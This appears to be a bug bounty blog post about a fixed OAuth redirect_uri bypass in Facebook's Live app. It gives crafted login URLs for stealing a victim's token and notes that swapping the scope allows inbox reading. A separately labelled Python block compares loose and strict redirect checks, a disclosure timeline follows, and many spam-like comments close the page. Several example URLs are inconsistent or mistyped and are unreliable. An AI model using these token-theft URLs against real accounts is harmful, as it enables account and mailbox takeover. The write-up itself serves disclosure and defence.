Facebook Live Application Authentication bypass
Hello Bug Bounty POC viewers. Today we are sharing a Facebook Live Application authentication bypass with you. This bug was found by Abdellah Yaala, a security researcher from Morocco. We have taken his permission to publish this POC on Bug Bounty POC; the finder of this bug retains full authority to publish or unpublish it. So let's start 😉
Facebook has a Live app through which a user can connect his Microsoft Live account to Facebook. When a user wants to import his contacts or reset his Facebook password using Hotmail / Outlook, he visits the following URL to authorize the request:
https://login.live.com/oauth20_authorize.srf?client_id=0000000044002503&response_type=code&redirect_url=https://wwww.facebook.com/accept_token.php%3Fapi_ver%3Dwave5%26csrf%3DAY4SvijoflL0B8zdxFgngr88d1tg-qTPSqgb-3aYo-ER5rDcFXSfuBDr4Q4ebXs%26appdata%3D%257B%2522use_case%2522%253A1%252c%2522flow%2522%253A22%%252c%2522
As you can see, the redirect_uri parameter of the URL (spelled redirect_url in the request above) points to:
https://facebook.com/accept_token.php?api_ver%3Dwave5%26csrf%3Day4Svijofll0b8ezdxf9gngr88ditg-qtpsqgb-3ayqo-er5rdcfxsfubdr4q41xbxs%26appdata%3d%257b%2522domain_id%2522%253a4%252c%2522tracked_params%2522%255b%255d%2522%257d
Now here's the bug: I can change that redirect_uri parameter and obtain the victim's token.
The bypass URI is:
https://www.facebook.com/ACCEPT_TOKEN.PHP?/!#/n/?https://apps.facebook.com/app_id?
Example – the link I send to the user:
https://login.live.com/oauth_author.srf?client_id=0000000044002503&response_type=code&redirect_url=facebook.com/accept_token.php%3f%2f%21%23%2fn%3fapps.facebook.com%2f935728666477748%2f&locale=en-us&scope=wli.contacts_email&display=popup&swu=1&username=ocpdomaine%40hotmail.com
So when this maliciously crafted URL is sent to the victim, I can obtain the victim's access token, and with it I can read the victim's inbox by changing the scope parameter to:
scope=https://outlook.office.com/Mail.Read
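The write-up does not say which property of the provider's redirect check the bypass defeated, so the following is an added illustration (not code from the post, Microsoft or Facebook) of the kind of loose matching that lets such URIs through, beside a strict check that rejects them. The registered endpoint, client_id, scope and both bypass URIs are taken from the URLs above; the `CLIENT` registration record and the loose check are assumptions.

```python
"""Redirect URI validation: an assumed loose prefix check beside strict matching."""
from urllib.parse import parse_qs, unquote, urlsplit

# Client registration as a defender would store it (constructed from the post).
CLIENT = {
    "client_id": "0000000044002503",
    "redirect": ("https", "www.facebook.com", "/accept_token.php"),
    "query_keys": {"api_ver", "csrf", "appdata"},  # dynamic values, so allowed by name
    "scopes": {"wli.contacts_email"},             # contacts import only
}


def loose_redirect_ok(candidate: str) -> bool:
    """Assumed weak check: decode, fold case, drop scheme and 'www.', then
    accept anything that merely *starts with* the registered endpoint."""
    u = unquote(candidate).lower()
    for prefix in ("https://", "http://", "www."):
        if u.startswith(prefix):
            u = u[len(prefix):]
    return u.startswith("facebook.com/accept_token.php")


def strict_redirect_ok(candidate: str) -> bool:
    """Hardened check: exact, case-sensitive scheme/host/path, no fragment, and
    only registered query parameter names. RFC 6749 3.1.2 asks for an exact
    string match; dynamic data such as a CSRF token belongs in `state`."""
    p = urlsplit(candidate)
    if (p.scheme, p.netloc, p.path) != CLIENT["redirect"] or p.fragment:
        return False
    return set(parse_qs(p.query, keep_blank_values=True)) <= CLIENT["query_keys"]


def scope_ok(requested: str) -> bool:
    """Refuse scopes the client never registered, e.g. a mailbox-read scope."""
    return set(requested.split()) <= CLIENT["scopes"]


# Sample inputs, constructed from the URLs in the write-up.
LEGIT = "https://www.facebook.com/accept_token.php?api_ver=wave5&csrf=AY4S&appdata=%7B%7D"
BYPASS_A = "https://www.facebook.com/ACCEPT_TOKEN.PHP?/!#/n/?https://apps.facebook.com/app_id?"
BYPASS_B = unquote("facebook.com/accept_token.php%3f%2f%21%23%2fn%3fapps.facebook.com%2f935728666477748%2f")

if __name__ == "__main__":
    for name, uri in (("legit", LEGIT), ("bypass_a", BYPASS_A), ("bypass_b", BYPASS_B)):
        print(name, "loose:", loose_redirect_ok(uri), "strict:", strict_redirect_ok(uri))
    print("Mail.Read scope allowed:", scope_ok("https://outlook.office.com/Mail.Read"))
```

Both bypass forms pass the loose check and fail the strict one, while the legitimate redirect passes both; the scope check shows the second control a provider needs, since a valid redirect alone does not stop a client from asking for broader access than it registered.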
Facebook Live Application Authentication bypass – Video POC:
Timeline
———-
Oct 25, 2015 – Report sent
Oct 29, 2015 – Facebook requested a proof of concept
Oct 30, 2015 – Proof of concept sent
Nov 4, 2015 at 00h15 GMT – Escalation by Facebook
Nov 4, 2015 at 2h25 GMT – Fix confirmed by Facebook
Nov 6, 2015 – Bounty of $7500 awarded by Facebook
A person essentially help to make seriously articles I would state. This is the very first time I frequented your web page and thus far? I amazed with the research you made to create this particular publish extraordinary. Fantastic job!
Thanks.. 🙂
I just want to say I am new to weblog and actually loved this web-site. Likely I’m going to bookmark your website . You certainly have beneficial posts. Appreciate it for revealing your blog.
thanks
I just want to mention I am just all new to blogging and site-building and certainly liked this blog. Almost certainly I’m likely to bookmark your blog post . You amazingly have remarkable articles and reviews. Kudos for sharing your website page.
You have touched some nice factors here. Any way keep up writing. Best regards
I don’t even know how I ended up here, but I thought this post was great. I do not know who you are but definitely you are going to a famous blogger if you are not already 😉 Cheers!
Thanks for any other excellent post. The place else may just anyone get that type of info in such a perfect method of writing? I have a presentation next week, and I’m on the look for such info.
Hello. impressive job. I did not imagine this. This is a splendid story. Thanks!
Hi, I do believe this is a great website. I stumbled upon it 😉 I will come back once again since I bookmarked it. Money and freedom is the greatest way to change, may you be rich and continue to guide other people.
This is really interesting, You are a very professional blogger. I’ve joined your feed and look ahead to searching for more of your great post. Also, I have shared your site in my social networks
Thank you for the auspicious writeup. It in fact was a amusement account it. Look advanced to far added agreeable from you! However, how can we communicate?
I loved as much as you will receive carried out right here. The sketch is attractive, your authored material stylish. nonetheless, you command get bought an nervousness over that you wish be delivering the following. unwell unquestionably come more formerly again since exactly the same nearly very often inside case you shield this increase.
I delight in, lead to I found exactly what I was looking for. You have ended my four day long hunt! God Bless you man. Have a great day. Bye
It’s actually a nice and helpful piece of information. I’m glad that you shared this helpful information with us. Please stay us up to date like this. Thanks for sharing.
I must voice my gratitude for your generosity for people that must have help with this concern. Your special dedication to passing the solution around had been incredibly productive and has surely helped folks much like me to achieve their pursuits. Your valuable useful information signifies a whole lot a person like me and even more to my mates. Thanks a ton; from all of us.
hey there and thank you for your information – I have certainly picked up anything new from right here. I did however expertise several technical points using this site, since I experienced to reload the website lots of times previous to I could get it to load properly. I had been wondering if your hosting is OK? Not that I am complaining, but slow loading instances times will often affect your placement in google and can damage your high quality score if ads and marketing with Adwords. Anyway I am adding this RSS to my e-mail and can look out for much more of your respective fascinating content. Make sure you update this again soon.
I could not resist commenting. Well written!
nice work thanks
I’m very happy to read this. This is the type of manual that needs to be given and not the accidental misinformation that is at the other blogs. Appreciate your sharing this best doc.
Wow! This could be one particular of the most beneficial blogs We’ve ever arrive across on this subject. Actually Magnificent. I am also a specialist in this topic therefore I can understand your hard work.
I precisely desired to appreciate you once again. I am not sure the things I would have accomplished without the actual basics provided by you relating to my field. It actually was a troublesome dilemma in my position, nevertheless considering your well-written style you handled that took me to weep with joy. Extremely grateful for this assistance and then hope that you recognize what a powerful job you happen to be putting in training many people with the aid of your web page. I’m certain you haven’t met any of us.
Good day! I just would like to offer you a huge thumbs up for your great information you have here on this post. I will be coming back to your website for more soon.
Good day! This is my first comment here so I just wanted to give a quick shout out and tell you I truly enjoy reading your blog posts. Can you recommend any other blogs/websites/forums that go over the same topics? Many thanks!
This post is genuinely a pleasant one it assists new internet visitors, who are wishing in favor of blogging.
I’m amazed, I have to admit. Rarely do I encounter a blog that’s equally educative and amusing, and without a doubt, you’ve hit the nail on the head. The problem is something not enough folks are speaking intelligently about. I’m very happy I found this in my hunt for something regarding this.
I do not even know how I ended up here, but I thought this post was good. I don’t know who you are but definitely you’re going to a famous blogger if you aren’t already 😉 Cheers!
Very good blog. Please read something mine. See you!
It’s really a nice and helpful piece of information. I am happy that you just shared this helpful info with us. Please keep us up to date like this. Thanks for sharing.
This is the perfect web site for anyone who would like to understand this topic. You realize a whole lot its almost tough to argue with you (not that I personally would want to…HaHa). You definitely put a fresh spin on a topic that has been written about for decades. Wonderful stuff, just great!
As a Newbie, I am continuously searching online for articles that can help me. Thank you
I simply wished to thank you so much once again. I am not sure what I would have worked on without the entire pointers revealed by you concerning that subject matter. It has been the distressing issue for me personally, however , taking note of this expert approach you managed the issue made me to leap with happiness. I will be thankful for your work and thus believe you really know what a powerful job you are always putting in training most people through the use of your websites. Probably you’ve never encountered any of us.
hello there and thank you for your information – I have certainly picked up anything new from right here. I did however expertise several technical points using this web site, since I experienced to reload the web site a lot of times previous to I could get it to load correctly. I had been wondering if your web host is OK? Not that I am complaining, but slow loading instances times will often affect your placement in google and could damage your high quality score if advertising and marketing with Adwords. Well I am adding this RSS to my e-mail and can look out for much more of your respective interesting content. Make sure you update this again very soon..
You really make it seem so easy together with your presentation but I to find this matter to be really something which I feel I might by no means understand. It sort of feels too complicated and very large for me. I am taking a look forward on your next put up, I will try to get the hang of it!
Useful info. Lucky me I discovered your web site by accident, and I’m surprised why this twist of fate didn’t came about in advance! I bookmarked it.
Its like you read my mind! You seem to know so much about this, like you wrote the book in it or something. I think that you can do with a few pics to drive the message home a little bit, but other than that, this is great blog. A fantastic read. I’ll certainly be back.
Nice blog here! Also your site loads up very fast! What web host are you using? Can I get your affiliate link to your host? I wish my web site loaded up as fast as yours lol
I keep listening to the reports talk about receiving boundless online grant applications so I have been looking around for the most excellent site to get one. Could you tell me please, where could i find some?
Hi my loved one! I wish to say that this article is amazing, nice written and include almost all vital infos. I would like to peer extra posts like this .
I don’t even know how I stopped up right here, but I assumed this post was great. I do not recognize who you are however definitely you are going to a famous blogger if you happen to are not already. Cheers!
Hello there! Do you know if they make any plugins to protect against hackers? I’m kinda paranoid about losing everything I’ve worked hard on. Any recommendations?
I have to thank you for the efforts you have put in writing this website. I am hoping to check out the same high-grade blog posts by you later on as well. In truth, your creative writing abilities has encouraged me to get my very own site now ;)
thanks a lot 🙂
I appreciate, cause I found exactly what I was looking for. You have ended my four day long hunt! God Bless you man. Have a great day. Bye
Thanks for your Wishes ^_^ 🙂
Wow! Thank you! I constantly needed to write on my website something like that. Can I implement a portion of your post to my blog?
It’s really a great and useful piece of info. I’m glad that you shared this helpful information with us. Please keep us informed like this. Thank you for sharing.
I think other site proprietors should take this website as an model, very clean and wonderful user friendly style and design, as well as the content. You’re an expert in this topic!
we are just learners! 🙂
not experts!
Thanks a lot
Happy hacking
Hi there very cool web site!! Man .. Beautiful .. Wonderful .. I will bookmark your website and take the feeds additionally… I’m happy to seek out so many useful info here in the publish, we need work out more strategies in this regard, thanks for sharing. . . . . .
Hello, you used to write great, but the last few posts have been kinda boring… I miss your tremendous writings. Past several posts are just a little out of track! come on!
We really apologize if any of our blog posts disappointed you!
Stay with us!
We promise to give you quality posts always! 🙂
Thanks
Happy Hacking
Nice post. I was checking constantly this blog and I’m impressed! Extremely helpful information specifically the last part 🙂 I care for such information much. I was seeking this certain info for a long time. Thank you and best of luck.
Wow! This can be one particular of the most helpful blogs We’ve ever arrive across on this subject. Basically Magnificent. I am also an expert in this topic therefore I can understand your hard work.
Thanks.. 🙂
I wanted to write a simple comment in order to say thanks to you for these awesome solutions you are sharing at this site. My prolonged internet investigation has now been recognized with really good tips to share with my friends and classmates. I ‘d claim that most of us readers are unequivocally fortunate to live in a decent place with very many outstanding people with insightful solutions. I feel truly fortunate to have seen your entire web pages and look forward to so many more excellent times reading here. Thanks a lot once again for all the details.
Hey, thanks a lot! 🙂
for your comments!
Happy Hacking!
Wow! Thank you! I continually needed to write on my blog something like that. Can I take a portion of your post to my blog?
It would be our Pleasure if you write about this blog and Share it!
Thanks a lot for your reviews!
Happy Hacking!
Regards
Bharat Sewani
I’m still learning from you, while I’m improving myself. I absolutely love reading all that is posted on your site.Keep the tips coming. I loved it!
Thanks a lot for your nice comments!
Extremely sorry for the late reply and approval!
Happy Hacking!
Wow that was unusual. I just wrote an really long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Regardless, just wanted to say superb blog!
Hey, sorry for the late reply!
Thanks for reading this blog!
I’ll approve all your comments! 🙂
This website was… how do you say it? Relevant!! Finally I’ve found something that helped me. Appreciate it!
Aw, this was a very good post. Taking the time and actual effort to generate a superb article… but what can I say… I procrastinate a lot and never seem to get nearly anything done.
I’m impressed, I have to admit. Rarely do I encounter a blog that’s equally educative and interesting, and without a doubt, you’ve hit the nail on the head. The issue is something that not enough people are speaking intelligently about. Now i’m very happy I found this during my search for something regarding this.